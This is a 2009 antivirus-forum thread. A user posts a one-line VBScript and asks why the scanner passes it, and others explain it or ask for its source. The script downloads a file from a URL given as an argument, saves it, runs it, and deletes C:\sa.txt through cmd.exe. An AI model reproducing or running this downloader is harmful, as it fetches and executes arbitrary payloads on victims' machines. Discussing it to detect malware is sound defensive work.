瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 大虾们看下这段代码,,瑞星报正常的

1   1  /  1  页   跳转

[求助] 大虾们看下这段代码,,瑞星报正常的

大虾们看下这段代码,,瑞星报正常的

fn=wscript.Arguments(1):set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET",wscript.Arguments(0),0:x.Send():set m=CreateObject("ADODB.Stream"):m.Mode=3:m.Type=1:m.Open():m.Write x.ResponseBody:m.SaveToFile fn,2:set a=CreateObject("shell.application"):a.shellexecute fn:a.shellexecute "cmd.exe","/c del C:\sa.txt"



大家分析下这段代码,,瑞星报正常,真TMD……

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
分享到:
gototop
 

回复:大虾们看下这段代码,,瑞星报正常的

是vbs脚本么?
调用cmd删除 C:\sa.txt
你去看看C盘下还有没有其他的脚本,有没有这个sa.txt
本帖被评分 1 次
gototop
 

回复:大虾们看下这段代码,,瑞星报正常的

告知此段代码使用的网站页面地址或告知与此相关的完整代码
gototop
 

回复:大虾们看下这段代码,,瑞星报正常的

这段代码不能正常运行,不报是正常的。
最后编辑瑞星工程师14 最后编辑于 2009-04-24 10:00:41
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT